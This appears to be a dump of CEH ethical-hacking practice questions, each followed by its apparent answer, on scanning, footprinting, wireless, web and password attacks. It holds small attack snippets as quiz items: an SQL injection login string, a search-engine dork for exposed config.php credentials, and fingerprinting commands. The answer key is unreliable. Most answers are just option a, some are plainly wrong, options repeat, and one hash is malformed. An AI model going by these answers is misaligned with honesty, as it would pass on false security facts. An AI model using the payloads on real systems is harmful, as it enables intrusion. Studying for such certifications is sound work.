John has scanned the web server with NMAP. However, he could not gather enough information to help him identify the operating system running on the remote host accurately. What would you suggest to John to help identify the OS that is being used on the remote web server? a. Telnet to an open port and grab the banner. b. Connect to the web server with a browser and look at the web page. c. Telnet to port 8080 on the web server and look at the default page code. d. Connect to the web server with an FTP client.

a. Telnet to an open port and grab the banner.

Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (PKI)? a. The CA is the trusted root that issues certificates. b. The root CA is the recovery agent used to encrypt data when a user's certificate is lost. c. The root CA is used to encrypt email messages to prevent unintended disclosure of data. d. The root CA stores the user's hash value for safekeeping.

a. The CA is the trusted root that issues certificates.

Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page again in vain. What is the probable cause of Bill's problem? a. The HTML file has permissions of ready only. b. There is a problem with the shell and he needs to run the attack again. c. You cannot use a buffer overflow to deface a web page. d. The system is a honeypot.

a. The HTML file has permissions of ready only.

Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens is in charge of information security at Bank of Timbuktu. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money hasn't been removed from the bank; instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries: Picture: (Test 3 #7) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-213.gif What kind of attack did the Hacker attempt to carry out at the bank? a. The Hacker first attempted logins with suspected user names,then used SQL Injection to gain access to valid bank login IDs. b. The Hacker used a generator module to pass results to the Web server and exploited Web application CGI vulnerability. c. The Hacker attempted Session hijacking,in which the Hacker opened an account with the bank,then logged in to receive a session ID,guessed the next ID and took over Jason's session. d. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.

a. The Hacker first attempted logins with suspected user names,then used SQL Injection to gain access to valid bank login IDs.

On wireless networks, SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless networks? a. The SSID is transmitted in clear text. b. The SSID is only 32 bits in length. c. The SSID is to identify a station,not a network. d. The SSID is the same as the MAC address for all vendors.

a. The SSID is transmitted in clear text.

All the web servers in the DMZ respond to ACK scan on port 80. Why is this happening ? a. The company is not using a stateful firewall b. They are all Windows based webserver c. The company is not using IDS d. They are all Unix based webserver

a. The company is not using a stateful firewall

A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System (OS) version installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:89 a. The host is likely a printer. b. The host is likely a Linux machine. c. The host is likely a Windows machine. d. The host is likely a router.

a. The host is likely a printer.

You wish to determine the operating system and type of web server being used. At the same time you wish to arouse no suspicion within the target organization. While some of the methods listed below work, which holds the least risk of detection? a. Use the netcraft web site look for the target organization's web site. b. Telnet to the web server and issue commands to illicit a response. c. Use nmap in paranoid mode and scan the web server. d. Make some phone calls and attempt to retrieve the information using social engineering.

a. Use the netcraft web site look for the target organization's web site.

Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. Picture: (Test 3 #34) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-223.gif How will you defend against hardware keyloggers when using public computers and Internet Kiosks? (Select 4 answers) a. The next key typed replaces selected text portion. E.g. if the password is "secret",one could type "s",then some dummy keys "asdfsd". Then these dummies could be selected with mouse,and next character from the password "e" is typed,which replaces the dummies "asdfsd" b. Alternate between typing the login credentials and typing characters somewhere else in the focus window c. The next key typed replaces selected text portion. E.g. if the password is "secret",one could type "s",then some dummy keys "asdfsd". Then these dummies could be selected with mouse,and next character from the password "e" is typed,which replaces the dummies "asdfsd" d. Type a wrong password first,later type the correct password on the login page defeating the keylogger recording e. Type a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter.

a. The next key typed replaces selected text portion. E.g. if the password is "secret",one could type "s",then some dummy keys "asdfsd". Then these dummies could be selected with mouse,and next character from the password "e" is typed,which replaces the dummies "asdfsd" b. Alternate between typing the login credentials and typing characters somewhere else in the focus window c. The next key typed replaces selected text portion. E.g. if the password is "secret",one could type "s",then some dummy keys "asdfsd". Then these dummies could be selected with mouse,and next character from the password "e" is typed,which replaces the dummies "asdfsd" e. Type a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter.

Which of the following is NOT a reason 802.11 WEP encryption is vulnerable? a. The standard does not provide for centralized key management b. The 24 bit Initialization Vector (IV) field is too small c. Automated tools like AirSnort are available to discover WEP keys d. There is no mutual authentication between wireless clients and access points

a. The standard does not provide for centralized key management

You are having problems while retrieving results after performing port scanning during internal testing. You verify that there are no security devices between you and the target system. When both stealth and connect scanning do not work, you decide to perform a NULL scan with NMAP. The first few systems scanned shows all ports open. Which one of the following statements is probably true? a. The systems are running Windows. b. The systems are web servers. c. The systems have all ports open. d. The systems are running a host based IDS.

a. The systems are running Windows.

During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the following attacks should be used to obtain the key? a. The tester must capture the WPA2 authentication handshake and then crack it. b. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard. c. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key. d. The tester must use the tool inSSIDer to crack it using the ESSID of the network.

a. The tester must capture the WPA2 authentication handshake and then crack it.

Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to [email protected]". What do you think has occurred? a. The web application returned the first record it found b. The web application picked up a record at random c. The server error has caused the application to malfunction d. The web application emailed the administrator about the error

a. The web application returned the first record it found

You are manually conducting Idle Scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs? a. The zombie you are using is not truly idle. b. A stateful inspection firewall is resetting your queries. c. Hping2 cannot be used for idle scanning. d. These ports are actually open on the target system.

a. The zombie you are using is not truly idle.

Which of the following business challenges could be solved by using a vulnerability scanner? a. There is a monthly requirement to test corporate compliance with host application usage and security policies. b. There is an emergency need to remove administrator access from multiple machines for an employee that quit. c. A web server was compromised and management needs to know if any further systems were compromised. d. Auditors want to discover if all systems are following a standard naming convention.

a. There is a monthly requirement to test corporate compliance with host application usage and security policies.

Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not illicit a response. What can he infer from this kind of response? a. These ports are open because they do not illicit a response. b. He can tell that these ports are in stealth mode. c. The scan was not performed correctly using NMAP since all ports,no matter what their state,will illicit some sort of response from an XMAS scan. d. If a port does not respond to an XMAS scan using NMAP,that port is closed.

a. These ports are open because they do not illicit a response.

Fred is scanning his network to ensure it is as secure as possible. Fred sends a TCP probe packet to a host with a FIN flag and he receives a RST/ACK response. What does this mean? a. This means that the port he is scanning on the host is closed. b. The RST/ACK response means the port Fred is scanning is disabled. c. This means the port he is scanning is half open. d. This response means the port he is scanning is open.

a. This means that the port he is scanning on the host is closed.

You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website? a. Through Archive.org b. Through Google searching cached files c. Visit customers' and partners' websites d. Download the website and crawl it

a. Through Archive.org

Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email [email protected]'. The application displays server error. What is wrong with the web application? a. User input is not sanitized b. The ISP connection is not reliable c. The web server may be down d. The email is not valid

a. User input is not sanitized

Which of the following are variants of mandatory access control mechanisms? (Choose two.) a. Username / password b. Two factor authentication c. User education program E. Sign in register d. Acceptable use policy

a. Username / password b. Two factor authentication

Anonymizer sites access the Internet on your behalf, protecting your personal information from disclosure. An anonymizer protects all of your computer's identifying information while it surfs for you, enabling you to remain at least one step removed from the sites you visit. You can visit Web sites without allowing anyone to gather information on sites visited by you. Services that provide anonymity disable pop-up windows and cookies, and conceal visitor's IP address. These services typically use a proxy server to process each HTTP request. When the user requests a Web page by clicking a hyperlink or typing a URL into their browser, the service retrieves and displays the information using its own server. The remote server (where the requested Web page resides) receives information on the anonymous Web surfing service in place of your information. In which situations would you want to use anonymizer? (Select 3 answers) a. To bypass blocking applications that would prevent access to Web sites or parts of sites that you want to visit. b. Post negative entries in blogs without revealing your IP identity c. Increase your Web browsing bandwidth speed by using Anonymizer d. To protect your privacy and Identity on the Internet

a. To bypass blocking applications that would prevent access to Web sites or parts of sites that you want to visit. b. Post negative entries in blogs without revealing your IP identity d. To protect your privacy and Identity on the Internet

You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in foot printing the organization? a. To learn about the operating systems,services and applications used on the network b. To test the limits of the corporate security policy enforced in the company c. To identify the number of employees working for the company d. To learn about the IP range used by the target network

a. To learn about the operating systems,services and applications used on the network

A POP3 client contacts the POP3 server: a. To receive mail b. to get the address to send mail to c. initiate a UDP SMTP connection to read mail d. to send and receive mail e. To send mail

a. To receive mail

TCP/IP Session Hijacking is carried out in which OSI layer? a. Transport layer b. Network layer c. Datalink layer d. Physical layer

a. Transport layer

Which of the following tool would be considered as Signature Integrity Verifier (SIV)? a. Tripwire b. SNORT c. VirusSCAN d. Nmap

a. Tripwire

Use the traceroute results shown above to answer the following question: Picture: (Test 6 # 43) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-557.gif The perimeter security at targetcorp.com does not permit ICMP TTL-expired packets out. a. True b. False

a. True

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed? a. Try to hang around the local pubs or restaurants near the bank,get talking to a poorly-paid or disgruntled employee,and offer them money if they'll abuse their access privileges by providing you with sensitive information b. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots" c. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network d. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

a. Try to hang around the local pubs or restaurants near the bank,get talking to a poorly-paid or disgruntled employee,and offer them money if they'll abuse their access privileges by providing you with sensitive information

A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique should the tester consider using? a. Tunneling scan over SSH b. Scanning using fragmented IP packets c. Tunneling over high port numbers d. Spoofing an IP address

a. Tunneling scan over SSH

You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place. Your peer, Peter Smith who works at the same department disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of "weakest link" in the security chain. What is Peter Smith talking about? a. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain b. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks c. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks d. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway

a. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers. a. Use port security on his switches. b. Use a firewall between all LAN segments. c. If you have a small network,use static ARP entries. d. Use a tool like ARPwatch to monitor for strange ARP activity. e. Use only static IP addresses on all PC's.

a. Use port security on his switches. c. If you have a small network,use static ARP entries. d. Use a tool like ARPwatch to monitor for strange ARP activity.

What ICMP message types are used by the ping command? a. Ping request (1) and Ping reply (2) b. Echo request (8) and Echo reply (0) c. Timestamp request (13) and timestamp reply (14) d. Echo request (0) and Echo reply (1)

b. Echo request (8) and Echo reply (0)

In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN over wireless implementation? a. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications. b. The stronger encryption used by the VPN slows down the network. c. VPNs use larger packets then wireless networks normally do. d. Using a VPN on wireless automatically enables WEP,which causes additional overhead.

a. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications.

Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of XYZ, he went through a few scanners that are currently available. Here are the scanners that he uses: 1. Axent's NetRecon (http://www.axent.com) 2. SARA, by Advanced Research Organization (http://www-arc.com/sara) 3. VLAD the Scanner, by Razor (http://razor.bindview.com/tools/) However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What would be the best method to accurately identify the services running on a victim host? a. Using the manual method of telnet to each of the open ports ofXYZ. b. Using the default port and OS to make a best guess of what services are running on each port forXYZ. c. Using Cheops-ng to identify the devices ofXYZ. d. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running forXYZ.

a. Using the manual method of telnet to each of the open ports ofXYZ.

A common technique for luring e-mail users into opening virus-launching attachments is to send messages that would appear to be relevant or important to many of their potential recipients. One way of accomplishing this feat is to make the virus-carrying messages appear to come from some type of business entity retailing sites, UPS, FEDEX, CITIBANK or a major provider of a common service. Here is a fraudulent e-mail claiming to be from FedEx regarding a package that could not be delivered. This mail asks the receiver to open an attachment in order to obtain the FEDEX tracking number for picking up the package. The attachment contained in this type of e-mail activates a virus. Picture: (Test 1 #59) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-059.gif Vendors send e-mails like this to their customers advising them not to open any files attached with the mail, as they do not include attachments. Fraudulent e-mail and legit e-mail that arrives in your inbox contain the fedex.com as the sender of the mail. How do you ensure if the e-mail is authentic and sent from fedex.com? a. Verify the digital signature attached with the mail,the fake mail will not have Digital ID at all b. Fake mail will have spelling/grammatical errors c. Check the Sender ID against the National Spam Database (NSD) d. Fake mail uses extensive images,animation and flash content

a. Verify the digital signature attached with the mail,the fake mail will not have Digital ID at all

Vulnerability scanners are automated tools that are used to identify vulnerabilities and misconfigurations of hosts. They also provide information regarding mitigating discovered vulnerabilities. Picture: (Test 1 #22) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-027.gif Which of the following statements is incorrect? a. Vulnerability scanners can identify weakness and automatically fix and patch the vulnerabilities without user intervention b. They can validate compliance with or deviations from the organization's security policy c. Vulnerability scanners attempt to identify vulnerabilities in the hosts scanned. d. Vulnerability scanners can help identify out-of-date software versions,missing patches,or system upgrades

a. Vulnerability scanners can identify weakness and automatically fix and patch the vulnerabilities without user intervention

Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply) a. Web sites b. News groups c. Organization's own web site d. Search engines e. CHAT rooms f. WHOIS database

a. Web sites b. News groups c. Organization's own web site d. Search engines e. CHAT rooms f. WHOIS database

Windump is the windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library? a. WinPCAP b. LibPCAP c. PCAP d. NTPCAP

a. WinPCAP

You have initiated an active operating system fingerprinting attempt with nmap against a target system: Picture: (Test 6 #91) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-586.gif What operating system is the target host running based on the open ports shown above? a. Windows 2000 Server b. Windows XP c. Windows 98 SE d. Windows NT4 Server

a. Windows 2000 Server

Which of the following systems would not respond correctly to an nmap XMAS scan? a. Windows 2000 Server running IIS 5 b. Any version of IRIX c. RedHat Linux 8.0 running Apache Web Server d. Any Solaris version running SAMBA Server

a. Windows 2000 Server running IIS 5

One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IP address. You send a ping request to the broadcast address 192.168.5.255. Picture: (Test 2 #41) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-148.gif There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why? a. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. b. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. c. You should send a ping request with this command ping ? 192.168.5.0-255 d. You cannot ping a broadcast address. The above scenario is wrong.

a. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.

What is the correct order of steps in CEH System Hacking Cycle? Picture: (Test 2 #87) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-199.gif a. Option B b. Option A c. Option D d. Option C

b. Option A

Yancey is a network security administrator for a large electric company. This company provides power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered? a. Yancey would be considered a Suicide Hacker b. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing c. Since he does not care about going to jail,he would be considered a Black Hat d. Because Yancey works for the company currently; he would be a White Hat

a. Yancey would be considered a Suicide Hacker

You are the CIO for Avantes Finance International, a global finance company based in Geneva. You are responsible for network functions and logical security throughout the entire corporation. Your company has over 250 servers running Windows Server, 5000 workstations running Windows Vista, and 200 mobile users working from laptops on Windows 7. Last week, 10 of your company's laptops were stolen from salesmen while at a conference in Amsterdam. These laptops contained proprietary company information. While doing damage assessment on the possible public relations nightmare this may become, a news story leaks about the stolen laptops and also that sensitive information from those computers was posted to a blog online. What built-in Windows feature could you have implemented to protect the sensitive information on these laptops? a. You could have implemented Encrypted File System (EFS) to encrypt the sensitive files on the laptops b. You should have used 3DES which is built into Windows c. You should have utilized the built-in feature of Distributed File System (DFS) to protect the sensitive information on the laptops d. If you would have implemented Pretty Good Privacy (PGP) which is built into Windows, the sensitive information on the laptops would not have leaked out

a. You could have implemented Encrypted File System (EFS) to encrypt the sensitive files on the laptops

Data hiding analysis can be useful in a. detecting and recovering data that may indicate knowledge,ownership or intent. b. identifying the amount of central processing unit (cpu) usage over time to process the data. c. preventing a denial of service attack on a set of enterprise servers to prevent users from accessing the data. d. determining the level of encryption used to encrypt the data.

a. detecting and recovering data that may indicate knowledge,ownership or intent.

One advantage of an application-level firewall is the ability to a. filter specific commands,such as http:post. b. retain state information for each packet. c. monitor tcp handshaking. d. filter packets at the network level.

a. filter specific commands,such as http:post.

ICMP ping and ping sweeps are used to check for active systems and to check a. if ICMP ping traverses a firewall. b. the location of the switchport in relation to the ICMP ping. c. the route that the ICMP ping took. d. the number of hops an ICMP ping takes to reach a destination.

a. if ICMP ping traverses a firewall.

Attackers footprint target Websites using Google Hacking techniques. Google hacking is a term that refers to the art of creating complex search engine queries. It detects websites that are vulnerable to numerous exploits and vulnerabilities. Google operators are used to locate specific strings of text within the search results. The configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. WordPress uses config.php that stores the database Username and Password. Picture: (Test 1 #97) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-095.gif Which of the below Google search string brings up sites with "config.php" files? a. intitle:index.of config.php b. Wordpress:index config.php c. Search:index config/php d. Config.php:index list

a. intitle:index.of config.php

You run nmap port Scan on 10.0.0.5 and attempt to gain banner/server information from services running on ports 21, 110 and 123. Here is the output of your scan results: Picture: (Test 1 #12) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-013.gif Which of the following nmap command did you run? a. nmap -O -sV -p21,110,123 10.0.0.5 b. nmap -F -sV -p21,110,123 10.0.0.5 c. nmap -A -sV -p21,110,123 10.0.0.5 d. nmap -T -sV -p21,110,123 10.0.0.5

a. nmap -O -sV -p21,110,123 10.0.0.5

The use of technologies like IPSec can help guarantee the followinG. authenticity, integrity, confidentiality and a. non-repudiation. b. security. c. operability. d. usability.

a. non-repudiation.

You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word 'facebook'? a. tcp contains facebook b. list.display.facebook c. display==facebook d.traffic.content==facebook

a. tcp contains facebook

Which of the following is a client-server tool utilized to evade firewall inspection? a. tcp-over-dns b. nikto c. kismet d. hping

a. tcp-over-dns

How can telnet be used to fingerprint a web server? a. telnet webserverAddress 80 HEAD / HTTP/1.0 b. telnet webserverAddress 80 PUT / HTTP/2.0 c. telnet webserverAddress 80 HEAD / HTTP/2.0 d. telnet webserverAddress 80 PUT / HTTP/1.0

a. telnet webserverAddress 80 HEAD / HTTP/1.0

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. a. true b. false

a. true

In which location, SAM hash passwords are stored in Windows 7? a.c:\windows\system32\config\SAM b.c:\winnt\system32\machine\SAM c.c:\windows\etc\drivers\SAM d.c:\windows\config\etc\SAM

a.c:\windows\system32\config\SAM

John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame? a.0xAAAAAAAAAAAA b. 0xFFFFFFFFFFFF c.0xBBBBBBBBBBBB d.0xDDDDDDDDDDDD

b. 0xFFFFFFFFFFFF

What is SYSKEY # of bits used for encryption? a. 256 b. 128 c. 40 d. 64

b. 128

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow? 1. #include <stdio.h> 2. void stripn1 (char *str) ( 3. while(strlen (str) && ( (str[strlen(str) - 1] == 13) | | 4. ( str[strlen (str) - 1] == 10 ))) { 5. str[strlen (str) - 1] = 0; 6. } 7. } 8, 9. int main() { 10. FILE *infile; 11. char fname [40]; 12. char line [100]; 13. int lcount; 14. 15. /* Read in the filename*/ 16. printf ("Enter the name of a ascii file: "); 17. fgets (fname, sizeof(fname), stdin); 18. 19. /* We need to get rid of the newline char. */ 20. stripnl (fname); 21. 22. /* Open the file.ned there was an error * If NULL is returned there was an error */ 23. if ((infile = fopen (fname, "r")) == NULL) { 24. printf ("Error Opening File.\n"); 25. exit(1); 26. } 27. 28. while( fgets(line, sizeof(line), infile) !=NULL ) { 29. /* Get each line from the infile */ 30. lcount++; 31. /* print the line number and data */ 32. printf("Line d: s", lcount, line); 33. } 34. 35. fclose (infile); /* Close the file */ 36. ) a. 20C.20 b. 17B.17 c. 32D.32 d. 35E.35 e. 9A.9

b. 17B.17

Which of the following LM hashes represent a password of less than 8 characters? (Select 2) a. 0182BD0BD4444BF836077A718CCDF409 b. 44EFCE164AB921CQAAD3B435B51404EE c. B757BF5C0D87772FAAD3B435B51404EE d. CEC52EB9C8E3455DC2265B23734E0DAC e. E52CAC67419A9A224A3B108F3FA6CB6D f. BA810DBA98995F1817306D272A9441BB

b. 44EFCE164AB921CQAAD3B435B51404EE c. B757BF5C0D87772FAAD3B435B51404EE

A client has approached you with a penetration test requirements. They are concerned with the possibility of external threat, and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of their respective department. What kind of penetration test would you recommend that would best address the client's concern? a. A Black Hat test b. A Grey Box test c. A Black Box test d. A White Box test e. A White Hat test f. A Grey Hat test

b. A Grey Box test

Ann would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable option? a. A UDP scan b. A TCP Connect scan c. A FIN scan d. A half-scan

b. A TCP Connect scan

Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changes? a. An integer variable. b. A hidden form field value. c. A hidden price value. d. A page cannot be changed locally,as it is served by a web server.

b. A hidden form field value.

The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure web applications by providing which one of the following services? a. An extensible security framework named COBIT b. A list of flaws and how to fix them c. Web application patches d. A security certification for hardened web applications

b. A list of flaws and how to fix them

Which of the following are advantages of adopting a Single Sign On (SSO) system? (Choose two.) a. A reduction in network and application monitoring since all recording will be completed at the SSO system b. A reduction in password fatigue for users because they do not need to know multiple passwords when accessing multiple applications c. A reduction in overall risk to the system since network and application attacks can only happen at the SSO point d. A reduction in system administration overhead since any user login problems can be resolved at the SSO system

b. A reduction in password fatigue for users because they do not need to know multiple passwords when accessing multiple applications d. A reduction in system administration overhead since any user login problems can be resolved at the SSO system

If you come across a sheepdip machine at your client's site, what should you do? a. A sheepdip coordinates several honeypots. b. A sheepdip computer is used only for virus-checking. c. A sheepdip computer is another name for a honeypot d. A sheepdip computers defers a denial of service attack.

b. A sheepdip computer is used only for virus-checking.

Which of the following descriptions is true about a static NAT? a. A static NAT uses a many-to-many mapping. b. A static NAT uses a one-to-one mapping. c. A static NAT uses a many-to-one mapping. d. A static NAT uses a one-to-many mapping.

b. A static NAT uses a one-to-one mapping.

Which of the following statements about a zone transfer correct?(Choose three.) a. A zone transfer passes all zone information that a nslookup server maintains b. A zone transfer is accomplished with the DNS c. A zone transfer can be prevented by blocking all inbound TCP port 53 connections d. A zone transfer passes all zone information that a DNS server maintains e. A zone transfer is accomplished with the nslookup service f. Zone transfers cannot occur on the Internet

b. A zone transfer is accomplished with the DNS c. A zone transfer can be prevented by blocking all inbound TCP port 53 connections d. A zone transfer passes all zone information that a DNS server maintains

Which of the following is a protocol that is prone to a man-in-the-middle (MITM) attack and maps a 32-bit address to a 48-bit address? a. RARP b. ARP c. ICMP d. ICPM

b. ARP

Jacob would like your advice on using a wireless hacking tool that can save him time and get him better results with lesser packets. You would like to recommend a tool that uses KoreK's implementation. Which tool would you recommend from the list below? a. John the Ripper b. Aircrack c. Shmoo d. Kismet

b. Aircrack

In an attempt to secure his wireless network, Bob turns off broadcasting of the SSI~ He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible? a. The SSID is still sent inside both client and AP packets. b. All access points are shipped with a default SSI c. Bob forgot to turn off DHCP. d. Bob's solution only works in ad-hoc mode.

b. All access points are shipped with a default SSI

RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this? a. The IV range is too small. b. All of the answers apply c. There are some flaws in the implementation. d. None of the answers apply. e. There is no key management.

b. All of the answers apply

This is an example of whois record. Picture: (Test 2 #64) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-165.gif Sometimes a company shares a little too much information on their organization through public domain records. Based on the above whois record, what can an attacker do? (Select 2 answers) a. Search engines like Google,Bing will expose information listed on the WHOIS record b. An attacker can attempt phishing and social engineering on targeted individuals using the information from WHOIS record c. Spammers can send unsolicited e-mails to addresses listed in the WHOIS record d. IRS Agents will use this information to track individuals using the WHOIS record information

b. An attacker can attempt phishing and social engineering on targeted individuals using the information from WHOIS record c. Spammers can send unsolicited e-mails to addresses listed in the WHOIS record

A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database? a. An attacker submits user input that executes an operating system command to compromise a target system b. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database c. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database d. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access

b. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database

Vulnerability mapping occurs after which phase of a penetration test? a. Host scanning b. Analysis of host scanning c. Passive information gathering d. Network level discovery

b. Analysis of host scanning

Which types of detection methods are employed by Network Intrusion Detection Systems (NIDS)? (Choose two.) a. Passive b. Anomaly c. Reactive d. Signature

b. Anomaly d. Signature

In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Picture: (Test 2 #63) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-167.gif Ignorant users usually fall prey to this scam. Which of the following statement is incorrect related to this attack? a. Do not reply to email messages or popup ads asking for personal or financial information b. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks c. Do not send credit card numbers,and personal or financial information via e-mail d. Review credit card and bank account statements regularly e. Do not trust telephone numbers in e-mails or popup ads

b. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks

When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations to perform external and internal penetration testing? a. At least twice a year or after any significant upgrade or modification b. At least once a year and after any significant upgrade or modification c. At least once every three years or after any significant upgrade or modification d. At least once every two years and after any significant upgrade or modification

b. At least once a year and after any significant upgrade or modification

This attack technique is used when a Web application is vulnerable to an SQL Injection but the results of the Injection are not visible to the attacker. a. Generic SQL Injection b. Blind SQL Injection c. Double SQL Injection d. Unique SQL Injection

b. Blind SQL Injection

